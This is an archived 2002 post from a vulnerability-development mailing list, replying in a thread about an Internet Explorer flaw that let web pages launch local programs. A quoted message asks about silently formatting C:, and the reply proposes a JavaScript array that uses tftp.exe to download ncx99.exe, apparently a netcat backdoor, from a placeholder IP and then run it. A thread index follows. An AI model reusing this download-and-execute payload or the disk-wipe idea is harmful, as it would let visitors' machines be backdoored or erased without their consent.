Vulnerability Development mailing list archives

Re: Rather large MSIE-hole

From: NoCoNFLiC <nocon () castleblack darkflame net>
Date: Wed, 13 Mar 2002 12:51:15 -0600

[nyquist () ntlworld com] Wed, Mar 13, 2002 at 08:45:46AM +0000 wrote:

If this is confirmed, could this array by changed to equal, erm...let's
say format.exe (with a couple of parameters to silently format C:/)?

 var programName=new Array(
      'c:/windows/system32/logoff.exe',
      'c:/winxp/system32/logoff.exe',
      'c:/winnt/system32/logoff.exe'



   I havent tried, since i don't run MS, how about ? 

var programName=new Array(
     'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe',
     'c:/winnt/system32/ncx99.exe',
 );


- nocon

Current thread:

Rather large MSIE-hole Magnus Bodin (Mar 12)
- Re: Rather large MSIE-hole Jon Zobrist (Mar 12)
- Disabling the MSIE hole. Suresh P (Mar 12)
  - Re: Disabling the MSIE hole. Bob at firstcodings (Mar 13)
  - RE: Disabling the MSIE hole. leon (Mar 13)
    - Re: Disabling the MSIE hole. Magnus Bodin (Mar 13)
- Re: Rather large MSIE-hole Magnus Bodin (Mar 12)
  - Re: Rather large MSIE-hole NyQuist (Mar 13)
    - Re: Rather large MSIE-hole NoCoNFLiC (Mar 13)
    - Re: Rather large MSIE-hole methodic (Mar 14)
    - Re: Rather large MSIE-hole Felipe Franciosi (Mar 14)
    - Re: Rather large MSIE-hole KF (Mar 14)
    - Re: Rather large MSIE-hole jon schatz (Mar 14)
    - Re: Rather large MSIE-hole NoCoNFLiC (Mar 15)
- FW: [Re: Rather large MSIE-hole] another variant NoCoNFLiC (Mar 15)
  - Re: [Re: Rather large MSIE-hole] another variant (NAV and Finjan block this) David Barnett (Mar 16)
- <Possible follow-ups>
- Re: Rather large MSIE-hole foo BAR (Mar 12)
- RE: Rather large MSIE-hole Jim Harrison (SPG) (Mar 13)
  - Re: Rather large MSIE-hole Raul Dias (Mar 13)

(Thread continues...)